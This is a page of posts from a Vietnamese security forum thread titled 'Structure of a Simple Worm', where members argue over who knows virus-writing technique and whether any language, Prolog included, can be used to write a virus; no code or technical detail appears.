  [Question]   Cấu Trúc Một Con Worm Đơn Giản 17/03/2007 23:59:43 (+0700) | #28 | 47462
[Avatar]
ngochoan2003
Member

[Minus]    0    [Plus]
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
[Profile] [PM] [WWW]

Look2Me wrote:
Ủng hộ NoHat! Tớ cũng chỉ thích bàn luận đến các vấn đề kỹ thuật thôi. Gét cái bọn chưa chắc biết cái gì copy vài cái code vớ vẩn ra show hàng. 

Ông nói thế ý gì đây ?
Ông muốn bàn luận đến các vấn đề kỹ thuật hả ? vậy tôi hỏi ông biết gì về "Kỹ thuật" của Virus chưa ? ông thử "Show" hàng lên cho anh em học hỏi nào !
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 18/03/2007 01:40:16 (+0700) | #29 | 47483
[Avatar]
delua
Locked

[Minus]    0    [Plus]
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
[Profile] [PM]

ngochoan2003 wrote:
:lolsmilie thế hả !
Thế bạn đã đọc kỹ chưa ?
Ý kiến của hackernohat thì OK rất đúng, Hoàng cũng vậy nhưng tôi chỉ muốn nói ở đây là ngôn ngữ lập trình nào cũng có thể viết được Virus. Chỉ có điều là khó hay dễ thôi.  


Bạn có thể lập trình trên những ngôn ngữ nào ? Đừng nên "quơ đũa cả nắm" như thế.

Đơn cử một cá nhân là lập trình Prolog.Bạn có thể viết được virus bằng Prolog không ????

[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 18/03/2007 03:19:41 (+0700) | #30 | 47494
[Avatar]
superdream
Member

[Minus]    0    [Plus]
Joined: 22/09/2006 17:53:30
Messages: 20
Offline
[Profile] [PM] [Email] [Yahoo!]
Mình thấy bài viết của bạn Can_tho_City rất bổ ích cho những newbie. Còn bác nào giỏi hơn thì cũng nên đưa ra bài viết cho a e học hỏi chứ đừng có chê trách nhau nhiều thế.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|